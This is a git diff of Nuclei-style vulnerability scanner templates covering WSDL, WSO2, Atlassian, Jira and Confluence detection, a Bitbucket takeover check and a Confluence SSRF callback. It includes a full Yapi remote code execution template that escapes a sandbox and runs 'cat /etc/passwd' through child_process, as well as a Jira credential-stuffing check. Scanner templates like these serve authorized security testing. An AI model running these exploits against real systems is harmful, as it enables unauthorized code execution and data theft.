name: http-options diff --git a/poc/api/wsdl-api-11632.yaml b/poc/api/wsdl-api-11632.yaml index 71703837f3..4bad6b6027 100644 --- a/poc/api/wsdl-api-11632.yaml +++ b/poc/api/wsdl-api-11632.yaml @@ -1,15 +1,27 @@ id: wsdl-api + info: - name: wsdl-detect + name: WSDL API - Detect author: jarijaas severity: info - description: Detects web services that have WSDL (https://www.w3.org/TR/wsdl/) + description: WSDL API was detected. + reference: https://www.w3.org/TR/wsdl/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 tags: exposure,api -requests: + +http: - method: GET path: - "{{BaseURL}}/?wsdl" + matchers: - type: word words: - "wsdl:definitions" + +# digest: 490a0046304402201eccb43d9aa98c6691258d0eb19fada4fa2f6f621bd15c11b2a909441194cc5502207038b072b9a896169b97f955541ab6a6c3d2ca0b551bbe148514ac0e0591a3f6:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/wsdl-api-11634.yaml b/poc/api/wsdl-api-11634.yaml new file mode 100644 index 0000000000..71703837f3 --- /dev/null +++ b/poc/api/wsdl-api-11634.yaml @@ -0,0 +1,15 @@ +id: wsdl-api +info: + name: wsdl-detect + author: jarijaas + severity: info + description: Detects web services that have WSDL (https://www.w3.org/TR/wsdl/) + tags: exposure,api +requests: + - method: GET + path: + - "{{BaseURL}}/?wsdl" + matchers: + - type: word + words: + - "wsdl:definitions" diff --git a/poc/api/wso2-apimanager-detect-11638.yaml b/poc/api/wso2-apimanager-detect-11638.yaml deleted file mode 100644 index 042ae34b83..0000000000 --- a/poc/api/wso2-apimanager-detect-11638.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: wso2-apimanager-detect -info: - name: WSO2 API Manager detect - author: righettod - severity: info - description: Try to detect the presence of a WSO2 API Manager instance via the version endpoint - tags: tech,wso2,api-manager -requests: - - method: GET - path: - - "{{BaseURL}}/services/Version" - matchers-condition: and - matchers: - - type: word - words: - - "version.services.core.carbon.wso2.org" - - type: status - status: - - 200 diff --git a/poc/api/yapi-rce-11724.yaml b/poc/api/yapi-rce-11724.yaml index 0afebedde5..e9f9d9d864 100644 --- a/poc/api/yapi-rce-11724.yaml +++ b/poc/api/yapi-rce-11724.yaml @@ -1,19 +1,17 @@ id: yapi-rce + info: - name: Yapi - Remote Code Execution + name: Yapi Remote Code Execution author: pikpikcu severity: critical - description: Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code. + tags: yapi,rce + description: A vulnerability in Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code. reference: - https://www.secpulse.com/archives/162502.html - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b - https://twitter.com/sec715/status/1415484190561161216 - https://github.com/YMFE/yapi - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 - tags: yapi,rce + requests: - raw: - | # REQUEST 1 @@ -21,35 +19,42 @@ requests: Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 - {"email":"{{randstr}}@interact.sh","password":"{{randstr}}","username":"{{randstr}}"} + {"email":"{{randstr}}@example.com","password":"{{randstr}}","username":"{{randstr}}"} + - | # REQUEST 2 GET /api/group/list HTTP/1.1 Host: {{Hostname}} Content-Type: application/json, text/plain, */* + - | # REQUEST 3 POST /api/project/add HTTP/1.1 Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 {"name":"{{randstr}}","basepath":"","group_id":"{{group_id}}","icon":"code-o","color":"cyan","project_type":"private"} + - | # REQUEST 4 GET /api/project/get?id={{project_id}} HTTP/1.1 Host: {{Hostname}} + - | # REQUEST 5 POST /api/interface/add HTTP/1.1 Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 {"method":"GET","catid":"{{project_id}}","title":"{{randstr_1}}","path":"/{{randstr_1}}","project_id":{{project_id}}} + - | # REQUEST 6 POST /api/plugin/advmock/save HTTP/1.1 Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 {"project_id":"{{project_id}}","interface_id":"{{interface_id}}","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","enable":true} + - | # REQUEST 7 GET /mock/{{project_id}}/{{randstr_1}} HTTP/1.1 Host: {{Hostname}} + cookie-reuse: true extractors: - type: regex @@ -59,6 +64,7 @@ requests: part: body regex: - '"_id":([0-9]+),"group_name"' + - type: regex name: interface_id group: 1 @@ -66,6 +72,7 @@ requests: part: body regex: - '"req_body_form":\[\],"_id":([0-9]+)' + - type: regex name: project_id group: 1 @@ -73,14 +80,14 @@ requests: part: body regex: - '"tag":\[\],"_id":([0-9]+)' + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" part: body + - type: status status: - 200 - -# Enhanced by mp on 2022/06/03 diff --git a/poc/api/yapi-rce-11725.yaml b/poc/api/yapi-rce-11725.yaml new file mode 100644 index 0000000000..0afebedde5 --- /dev/null +++ b/poc/api/yapi-rce-11725.yaml @@ -0,0 +1,86 @@ +id: yapi-rce +info: + name: Yapi - Remote Code Execution + author: pikpikcu + severity: critical + description: Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code. + reference: + - https://www.secpulse.com/archives/162502.html + - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b + - https://twitter.com/sec715/status/1415484190561161216 + - https://github.com/YMFE/yapi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + tags: yapi,rce +requests: + - raw: + - | # REQUEST 1 + POST /api/user/reg HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json;charset=UTF-8 + + {"email":"{{randstr}}@interact.sh","password":"{{randstr}}","username":"{{randstr}}"} + - | # REQUEST 2 + GET /api/group/list HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json, text/plain, */* + - | # REQUEST 3 + POST /api/project/add HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json;charset=UTF-8 + + {"name":"{{randstr}}","basepath":"","group_id":"{{group_id}}","icon":"code-o","color":"cyan","project_type":"private"} + - | # REQUEST 4 + GET /api/project/get?id={{project_id}} HTTP/1.1 + Host: {{Hostname}} + - | # REQUEST 5 + POST /api/interface/add HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json;charset=UTF-8 + + {"method":"GET","catid":"{{project_id}}","title":"{{randstr_1}}","path":"/{{randstr_1}}","project_id":{{project_id}}} + - | # REQUEST 6 + POST /api/plugin/advmock/save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json;charset=UTF-8 + + {"project_id":"{{project_id}}","interface_id":"{{interface_id}}","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","enable":true} + - | # REQUEST 7 + GET /mock/{{project_id}}/{{randstr_1}} HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + extractors: + - type: regex + name: group_id + group: 1 + internal: true + part: body + regex: + - '"_id":([0-9]+),"group_name"' + - type: regex + name: interface_id + group: 1 + internal: true + part: body + regex: + - '"req_body_form":\[\],"_id":([0-9]+)' + - type: regex + name: project_id + group: 1 + internal: true + part: body + regex: + - '"tag":\[\],"_id":([0-9]+)' + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/03 diff --git a/poc/atlassian/atlassian-bamboo-panel.yaml b/poc/atlassian/atlassian-bamboo-panel.yaml new file mode 100644 index 0000000000..3faf916ca1 --- /dev/null +++ b/poc/atlassian/atlassian-bamboo-panel.yaml @@ -0,0 +1,44 @@ +id: atlassian-bamboo-panel + +info: + name: Atlassian Bamboo Login Panel - Detect + author: righettod + severity: info + description: | + Atlassian Bamboo login panel was detected. + reference: + - https://www.atlassian.com/software/bamboo + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"Bamboo" + tags: panel,bamboo,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/userlogin!doDefault.action?os_destination=%2Fstart.action" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Log in as a Bamboo user' + - 'content="Bamboo' + - 'atlassian.bamboo.plugins' + - 'Atlassian Bamboo</a>' + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'version\s+([0-9A-Za-z\s\.]+)\s+-' + - 'pvpVersion = "([a-z0-9.]+)";' +# digest: 4b0a00483046022100ece84998eb9793b9e2c73bac643c4cf195724becb28ccb35d37fad0066c4967b022100b75da45856fa8d90182181299882a1339a8ba78ccc81f4964c4754a16e3acf6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/atlassian/atlassian-crowd-panel-583.yaml b/poc/atlassian/atlassian-crowd-panel-583.yaml deleted file mode 100644 index 3532e9a84c..0000000000 --- a/poc/atlassian/atlassian-crowd-panel-583.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: atlassian-crowd-panel - -info: - name: Atlassian Crowd Login Panel - author: organiccrap - severity: info - description: An Atlassian Crowd login panel was discovered. - reference: - - https://www.atlassian.com/ - classification: - cwe-id: CWE-200 - tags: panel,atlassian - -requests: - - method: GET - path: - - '{{BaseURL}}/crowd/console/login.action' - - matchers: - - type: word - words: - - <title>Atlassian Crowd - Login - part: body - -# Enhanced by mp on 2022/03/20 diff --git a/poc/atlassian/bitbucket-takeover-738.yaml b/poc/atlassian/bitbucket-takeover-738.yaml new file mode 100644 index 0000000000..2987941c14 --- /dev/null +++ b/poc/atlassian/bitbucket-takeover-738.yaml @@ -0,0 +1,21 @@ +id: bitbucket-takeover +info: + name: Bitbucket Takeover Detection + author: pdteam + severity: high + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + words: + - "Repository not found" + part: body + - type: word + words: + - "text/plain" + part: header diff --git a/poc/atlassian/bitbucket-takeover-739.yaml b/poc/atlassian/bitbucket-takeover-739.yaml index 2987941c14..9d027b93b1 100644 --- a/poc/atlassian/bitbucket-takeover-739.yaml +++ b/poc/atlassian/bitbucket-takeover-739.yaml @@ -1,21 +1,26 @@ id: bitbucket-takeover + info: name: Bitbucket Takeover Detection author: pdteam severity: high + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word words: - "Repository not found" part: body + - type: word words: - "text/plain" - part: header + part: header \ No newline at end of file diff --git a/poc/atlassian/bitbucket-takeover-740.yaml b/poc/atlassian/bitbucket-takeover-740.yaml deleted file mode 100644 index b0aabdf6b4..0000000000 --- a/poc/atlassian/bitbucket-takeover-740.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: bitbucket-takeover -info: - name: Bitbucket Takeover Detection - author: pdcommunity - severity: high - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: word - words: - - "Repository not found" - part: body - - type: word - words: - - "text/plain" - part: header diff --git a/poc/atlassian/bitbucket-takeover.yaml b/poc/atlassian/bitbucket-takeover.yaml index e93be7cca6..b0aabdf6b4 100644 --- a/poc/atlassian/bitbucket-takeover.yaml +++ b/poc/atlassian/bitbucket-takeover.yaml @@ -1,34 +1,21 @@ id: bitbucket-takeover - info: name: Bitbucket Takeover Detection - author: pdteam + author: pdcommunity severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz - metadata: - max-request: 1 tags: takeover - -http: + reference: https://github.com/EdOverflow/can-i-take-over-xyz +requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and matchers: - - type: dsl - dsl: - - Host != ip - - type: word words: - "Repository not found" part: body - - type: word words: - "text/plain" part: header - -# digest: 490a0046304402205b7987c056997dd8161cbd726a93029f3a2d206d66578330bd5fba78acdbb0b302201841488659a4fbf01a69e02d721787a50df41e386528a826981c64d5c2154306:922c64590222798bb761d5b6d8e72950 diff --git a/poc/atlassian/confluence-detect-1186.yaml b/poc/atlassian/confluence-detect-1186.yaml index ba239b67f4..0e63d59c09 100644 --- a/poc/atlassian/confluence-detect-1186.yaml +++ b/poc/atlassian/confluence-detect-1186.yaml @@ -5,9 +5,10 @@ info: author: philippedelteil severity: info description: Allows you to detect Atlassian Confluence instances - tags: tech,confluence,atlassian metadata: - shodan-query: https://www.shodan.io/search?query=http.component%3A%22atlassian+confluence%22 + shodan-query: http.component:"Atlassian Confluence" + tags: tech,confluence,atlassian + requests: - method: GET @@ -19,19 +20,18 @@ requests: redirects: true stop-at-first-match: true - matchers-condition: and + matchers-condition: or matchers: - type: word + part: header words: - - '-Confluence-' - '-confluence-' - part: header - condition: or + case-insensitive: true - type: word + part: body words: - 'confluence-base-url' - part: body extractors: - type: regex diff --git a/poc/atlassian/confluence-detect-1187.yaml b/poc/atlassian/confluence-detect-1187.yaml deleted file mode 100644 index 0e17bc5ab9..0000000000 --- a/poc/atlassian/confluence-detect-1187.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: confluence-detect - -info: - name: Confluence Detect - author: philippedelteil - severity: info - description: Allows you to detect Atlassian Confluence instances - metadata: - shodan-query: http.component:"Atlassian Confluence" - tags: tech,confluence,atlassian - -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/pages" - - "{{BaseURL}}/confluence" - - "{{BaseURL}}/wiki" - - redirects: true - stop-at-first-match: true - matchers-condition: or - matchers: - - type: word - part: header - words: - - '-confluence-' - case-insensitive: true - - - type: word - part: body - words: - - 'confluence-base-url' - - extractors: - - type: regex - part: body - group: 1 - regex: - - 'Atlassian Confluence ([a-z0-9-._]+)' diff --git a/poc/atlassian/confluence-detect-1189.yaml b/poc/atlassian/confluence-detect-1189.yaml new file mode 100644 index 0000000000..ba239b67f4 --- /dev/null +++ b/poc/atlassian/confluence-detect-1189.yaml @@ -0,0 +1,41 @@ +id: confluence-detect + +info: + name: Confluence Detect + author: philippedelteil + severity: info + description: Allows you to detect Atlassian Confluence instances + tags: tech,confluence,atlassian + metadata: + shodan-query: https://www.shodan.io/search?query=http.component%3A%22atlassian+confluence%22 + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/pages" + - "{{BaseURL}}/confluence" + - "{{BaseURL}}/wiki" + + redirects: true + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - '-Confluence-' + - '-confluence-' + part: header + condition: or + + - type: word + words: + - 'confluence-base-url' + part: body + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'Atlassian Confluence ([a-z0-9-._]+)' diff --git a/poc/atlassian/confluence-ssrf-sharelinks-1191.yaml b/poc/atlassian/confluence-ssrf-sharelinks-1191.yaml index ed2faf3539..ce7c19d866 100644 --- a/poc/atlassian/confluence-ssrf-sharelinks-1191.yaml +++ b/poc/atlassian/confluence-ssrf-sharelinks-1191.yaml @@ -1,44 +1,19 @@ id: confluence-ssrf-sharelinks - info: - name: Atlassian Confluence < 5.8.6 Server-Side Request Forgery + name: Confluence SSRF in sharelinks author: TechbrunchFR severity: medium - description: Atlassian Confluence < 5.8.6 is affected by a blind server-side request forgery vulnerability in the widgetconnector plugin. + description: Vulnerable should be Confluence versions released from 2016 November and older reference: - https://bitbucket.org/atlassian/confluence-business-blueprints/pull-requests/144/issue-60-conf-45342-ssrf-in-sharelinks - https://github.com/assetnote/blind-ssrf-chains#confluence - - https://nvd.nist.gov/vuln/detail/CVE-2021-26072 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 6.8 - cwe-id: CWE-918 - remediation: Upgrade to Atlassian Confluence version 5.8.6 or later. - metadata: - shodan-query: http.component:"Atlassian Confluence" - tags: confluence,atlassian,ssrf,oast - + tags: confluence,atlassian,ssrf,jira,oast requests: - method: GET path: - '{{BaseURL}}/rest/sharelinks/1.0/link?url=https://{{interactsh-url}}/' - - matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - - - type: word - part: body - words: - - "faviconURL" - - "domain" - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/14 diff --git a/poc/atlassian/confluence-ssrf-sharelinks-1192.yaml b/poc/atlassian/confluence-ssrf-sharelinks-1192.yaml new file mode 100644 index 0000000000..ed2faf3539 --- /dev/null +++ b/poc/atlassian/confluence-ssrf-sharelinks-1192.yaml @@ -0,0 +1,44 @@ +id: confluence-ssrf-sharelinks + +info: + name: Atlassian Confluence < 5.8.6 Server-Side Request Forgery + author: TechbrunchFR + severity: medium + description: Atlassian Confluence < 5.8.6 is affected by a blind server-side request forgery vulnerability in the widgetconnector plugin. + reference: + - https://bitbucket.org/atlassian/confluence-business-blueprints/pull-requests/144/issue-60-conf-45342-ssrf-in-sharelinks + - https://github.com/assetnote/blind-ssrf-chains#confluence + - https://nvd.nist.gov/vuln/detail/CVE-2021-26072 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 6.8 + cwe-id: CWE-918 + remediation: Upgrade to Atlassian Confluence version 5.8.6 or later. + metadata: + shodan-query: http.component:"Atlassian Confluence" + tags: confluence,atlassian,ssrf,oast + +requests: + - method: GET + path: + - '{{BaseURL}}/rest/sharelinks/1.0/link?url=https://{{interactsh-url}}/' + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: word + part: body + words: + - "faviconURL" + - "domain" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/14 diff --git a/poc/atlassian/confluence-ssrf-sharelinks-1193.yaml b/poc/atlassian/confluence-ssrf-sharelinks-1193.yaml deleted file mode 100644 index 7e693c969d..0000000000 --- a/poc/atlassian/confluence-ssrf-sharelinks-1193.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: confluence-ssrf-sharelinks - -info: - name: Confluence SSRF in sharelinks - author: TechbrunchFR - severity: medium - description: Vulnerable should be Confluence versions released from 2016 November and older - reference: - - https://bitbucket.org/atlassian/confluence-business-blueprints/pull-requests/144/issue-60-conf-45342-ssrf-in-sharelinks - - https://github.com/assetnote/blind-ssrf-chains#confluence - metadata: - shodan-query: http.component:"Atlassian Confluence" - tags: confluence,atlassian,ssrf,oast - -requests: - - method: GET - path: - - '{{BaseURL}}/rest/sharelinks/1.0/link?url=https://{{interactsh-url}}/' - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - - - type: word - part: body - words: - - "faviconURL" - - "domain" - condition: and - - - type: status - status: - - 200 \ No newline at end of file diff --git a/poc/atlassian/jira-detect-8313.yaml b/poc/atlassian/jira-detect-8313.yaml new file mode 100644 index 0000000000..f1891fc518 --- /dev/null +++ b/poc/atlassian/jira-detect-8313.yaml @@ -0,0 +1,25 @@ +id: jira-detect +info: + name: Detect Jira Issue Management Software + author: pdteam,philippedelteil + severity: info + tags: panel,jira +requests: + - method: GET + path: + - "{{BaseURL}}/secure/Dashboard.jspa" + - "{{BaseURL}}/jira/secure/Dashboard.jspa" + - "{{BaseURL}}/login.jsp" + stop-at-first-match: true + redirects: true + max-redirects: 2 + matchers: + - type: word + words: + - "Project Management Software" + extractors: + - type: regex + part: body + group: 1 + regex: + - 'title="JiraVersion" value="([0-9.]+)' diff --git a/poc/atlassian/jira-detect-8314.yaml b/poc/atlassian/jira-detect-8314.yaml deleted file mode 100644 index 4f24793ad5..0000000000 --- a/poc/atlassian/jira-detect-8314.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: jira-detect - -info: - name: Detect Jira Issue Management Software - author: pdteam,philippedelteil - severity: info - tags: panel,jira - -requests: - - method: GET - path: - - "{{BaseURL}}/secure/Dashboard.jspa" - - "{{BaseURL}}/jira/secure/Dashboard.jspa" - - "{{BaseURL}}/login.jsp" - - stop-at-first-match: true - redirects: true - max-redirects: 2 - matchers: - - type: word - words: - - "Project Management Software" - - extractors: - - type: regex - part: body - group: 1 - regex: - - 'title="JiraVersion" value="([0-9.]+)' diff --git a/poc/atlassian/jira-detect-8316.yaml b/poc/atlassian/jira-detect-8316.yaml index f1891fc518..4f24793ad5 100644 --- a/poc/atlassian/jira-detect-8316.yaml +++ b/poc/atlassian/jira-detect-8316.yaml @@ -1,15 +1,18 @@ id: jira-detect + info: name: Detect Jira Issue Management Software author: pdteam,philippedelteil severity: info tags: panel,jira + requests: - method: GET path: - "{{BaseURL}}/secure/Dashboard.jspa" - "{{BaseURL}}/jira/secure/Dashboard.jspa" - "{{BaseURL}}/login.jsp" + stop-at-first-match: true redirects: true max-redirects: 2 @@ -17,6 +20,7 @@ requests: - type: word words: - "Project Management Software" + extractors: - type: regex part: body diff --git a/poc/atlassian/jira-login-default.yaml b/poc/atlassian/jira-login-default.yaml index 4b34037e6d..d3d14b37e6 100644 --- a/poc/atlassian/jira-login-default.yaml +++ b/poc/atlassian/jira-login-default.yaml @@ -8,10 +8,10 @@ info: reference: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: + max-request: 1 shodan-query: http.component:"Atlassian Jira" fofa-query: product="JIRA" tags: login-check,jira,creds-stuffing,self-hosted - variables: username: "{{username}}" password: "{{password}}" @@ -32,8 +32,8 @@ http: dsl: - username - password - attack: pitchfork + matchers-condition: and matchers: - type: word @@ -43,4 +43,6 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 + +# digest: 4a0a0047304502201b101496c1854e349bf95753e7cdfb3343d8599dc26efb543e4c3ceb2bb95e1f0221008648d8f4932d84b324ff6a350ea792a0ef1ef91a393292f43082173ccbb99a54:922c64590222798bb761d5b6d8e72950 diff --git a/poc/atlassian/jira-unauthenticated-dashboards-8323.yaml b/poc/atlassian/jira-unauthenticated-dashboards-8323.yaml index 8628c41074..f31db155cc 100644 --- a/poc/atlassian/jira-unauthenticated-dashboards-8323.yaml +++ b/poc/atlassian/jira-unauthenticated-dashboards-8323.yaml @@ -1,21 +1,15 @@ id: jira-unauthenticated-dashboards - # If public sharing is ON it allows users to share dashboards and filters with all users including -# those that are not logged in. Those dashboards and filters could reveal potentially sensitive information. +# those that are not logged in. Those dashboard and filters could reveal potentially sensitive information. info: name: Jira Unauthenticated Dashboards author: TechbrunchFR severity: info - metadata: - max-request: 1 - shodan-query: http.component:"Atlassian Jira" tags: atlassian,jira - -http: +requests: - method: GET path: - "{{BaseURL}}/rest/api/2/dashboard?maxResults=100" - matchers: - type: word words: @@ -31,4 +25,3 @@ http: # If you change this setting, you will still need to update the existing filters and dashboards if they have already been # shared publicly. # Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. -# digest: 4a0a0047304502210082b7cb53987cdc653c9a8954733b3456da26355e585b238aa94d81e7938d77f302204de8001df94c11cc650f5ae455212a63c404a066cc29b911fd45686c3bde1a9e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/atlassian/jira-unauthenticated-dashboards-8327.yaml b/poc/atlassian/jira-unauthenticated-dashboards-8327.yaml index 54b3c68a6d..8628c41074 100644 --- a/poc/atlassian/jira-unauthenticated-dashboards-8327.yaml +++ b/poc/atlassian/jira-unauthenticated-dashboards-8327.yaml @@ -1,16 +1,21 @@ id: jira-unauthenticated-dashboards -# If public sharing is ON it allows users to share dashboards and filters with all users including +# If public sharing is ON it allows users to share dashboards and filters with all users including # those that are not logged in. Those dashboards and filters could reveal potentially sensitive information. info: name: Jira Unauthenticated Dashboards author: TechbrunchFR severity: info + metadata: + max-request: 1 + shodan-query: http.component:"Atlassian Jira" tags: atlassian,jira -requests: + +http: - method: GET path: - "{{BaseURL}}/rest/api/2/dashboard?maxResults=100" + matchers: - type: word words: @@ -20,15 +25,10 @@ requests: condition: and # Remediation: - # Ensure that this permission is restricted to specific groups that require it. - # You can restrict it in Administration > System > Global Permissions. - # Turning the feature off will not affect existing filters and dashboards. - # If you change this setting, you will still need to update the existing filters and dashboards if they have already been - # shared publicly. - # Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. +# digest: 4a0a0047304502210082b7cb53987cdc653c9a8954733b3456da26355e585b238aa94d81e7938d77f302204de8001df94c11cc650f5ae455212a63c404a066cc29b911fd45686c3bde1a9e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/atlassian/jira-unauthenticated-installed-gadgets-8328.yaml b/poc/atlassian/jira-unauthenticated-installed-gadgets-8328.yaml index da56b71092..bb38dd61ea 100644 --- a/poc/atlassian/jira-unauthenticated-installed-gadgets-8328.yaml +++ b/poc/atlassian/jira-unauthenticated-installed-gadgets-8328.yaml @@ -1,17 +1,14 @@ id: jira-unauthenticated-installed-gadgets - info: name: Jira Unauthenticated Installed gadgets author: philippedelteil severity: info description: Some Jira instances allow to read the installed gadgets (sometimes it's also possible to read config xml file for some gadgets) tags: atlassian,jira - requests: - method: GET path: - "{{BaseURL}}/rest/config/1.0/directory" - redirects: true max-redirects: 2 matchers-condition: and @@ -19,7 +16,6 @@ requests: - type: word words: - 'jaxbDirectoryContents' - - type: status status: - 200 diff --git a/poc/atlassian/jira-unauthenticated-installed-gadgets-8330.yaml b/poc/atlassian/jira-unauthenticated-installed-gadgets-8330.yaml new file mode 100644 index 0000000000..58e5fb36b6 --- /dev/null +++ b/poc/atlassian/jira-unauthenticated-installed-gadgets-8330.yaml @@ -0,0 +1,31 @@ +id: jira-unauthenticated-installed-gadgets + +info: + name: Jira Unauthenticated Installed gadgets + author: philippedelteil + severity: info + description: Some Jira instances allow to read the installed gadgets (sometimes it's also possible to read config xml file for some gadgets) + metadata: + max-request: 1 + shodan-query: http.component:"Atlassian Jira" + tags: atlassian,jira + +http: + - method: GET + path: + - "{{BaseURL}}/rest/config/1.0/directory" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'jaxbDirectoryContents' + + - type: status + status: + - 200 + +# digest: 4a0a0047304502210099f7859c8f6312ba07f43ba7d80b6ced1937f1ffc2ae555b1ae5d11f1cdc797d02207e68b09ecc7c8f7767224d8b8e07d539a312323747af7ba36059c9c5bdb4a5c9:922c64590222798bb761d5b6d8e72950 diff --git a/poc/atlassian/jira-unauthenticated-popular-filters-8331.yaml b/poc/atlassian/jira-unauthenticated-popular-filters-8331.yaml deleted file mode 100644 index 0049e91b4e..0000000000 --- a/poc/atlassian/jira-unauthenticated-popular-filters-8331.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: jira-unauthenticated-popular-filters - -info: - name: Jira Unauthenticated Popular Filters - author: TechbrunchFR - severity: Info - -requests: - - method: GET - path: - - "{{BaseURL}}/secure/ManageFilters.jspa?filter=popular&filterView=popular" - matchers: - - type: word - words: - - 'filterlink_' - -# Remediation: -# Ensure that this permission is restricted to specific groups that require it. -# You can restrict it in Administration > System > Global Permissions. -# Turning the feature off will not affect existing filters and dashboards. -# If you change this setting, you will still need to update the existing filters and dashboards if they have already been -# shared publicly. -# Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. diff --git a/poc/atlassian/jira-unauthenticated-popular-filters.yaml b/poc/atlassian/jira-unauthenticated-popular-filters.yaml index 304d20f9a0..6fbda02ff3 100644 --- a/poc/atlassian/jira-unauthenticated-popular-filters.yaml +++ b/poc/atlassian/jira-unauthenticated-popular-filters.yaml @@ -1,9 +1,8 @@ -id: jira-unauth-popular-filters +id: jira-unauthenticated-popular-filters info: name: Jira Unauthenticated Popular Filters author: TechbrunchFR - severity: info - tags: atlassian,jira + severity: Info requests: - method: GET path: diff --git a/poc/atlassian/jira-unauthenticated-projectcategories-8334.yaml b/poc/atlassian/jira-unauthenticated-projectcategories-8334.yaml index 3d65baf18e..ff6dcd5d49 100644 --- a/poc/atlassian/jira-unauthenticated-projectcategories-8334.yaml +++ b/poc/atlassian/jira-unauthenticated-projectcategories-8334.yaml @@ -4,12 +4,9 @@ info: name: Jira Unauthenticated Project Categories author: TESS severity: info - metadata: - max-request: 1 - shodan-query: http.component:"Atlassian Jira" tags: atlassian,jira -http: +requests: - method: GET path: - "{{BaseURL}}/rest/api/2/projectCategory?maxResults=1000" @@ -31,5 +28,3 @@ http: part: header words: - "atlassian.xsrf.token" - -# digest: 4b0a004830460221008f66b3babbdae57b4672c9d6216a67a6b8ca43341b00e673ace120d7b57348410221008bf9c86ab7e3683d0bf6c23dfd9d5220bdd0f070bcb849fbc025127939852ebd:922c64590222798bb761d5b6d8e72950 diff --git a/poc/atlassian/jira-unauthenticated-projectcategories-8332.yaml b/poc/atlassian/jira-unauthenticated-projectcategories.yaml similarity index 100% rename from poc/atlassian/jira-unauthenticated-projectcategories-8332.yaml rename to poc/atlassian/jira-unauthenticated-projectcategories.yaml diff --git a/poc/atlassian/jira-unauthenticated-user-picker-8341.yaml b/poc/atlassian/jira-unauthenticated-user-picker-8341.yaml index 0a88ec36aa..0ce9858072 100644 --- a/poc/atlassian/jira-unauthenticated-user-picker-8341.yaml +++ b/poc/atlassian/jira-unauthenticated-user-picker-8341.yaml @@ -1,22 +1,14 @@ id: jira-unauthenticated-user-picker - info: name: Jira Unauthenticated User Picker author: TechbrunchFR severity: info - metadata: - max-request: 1 - 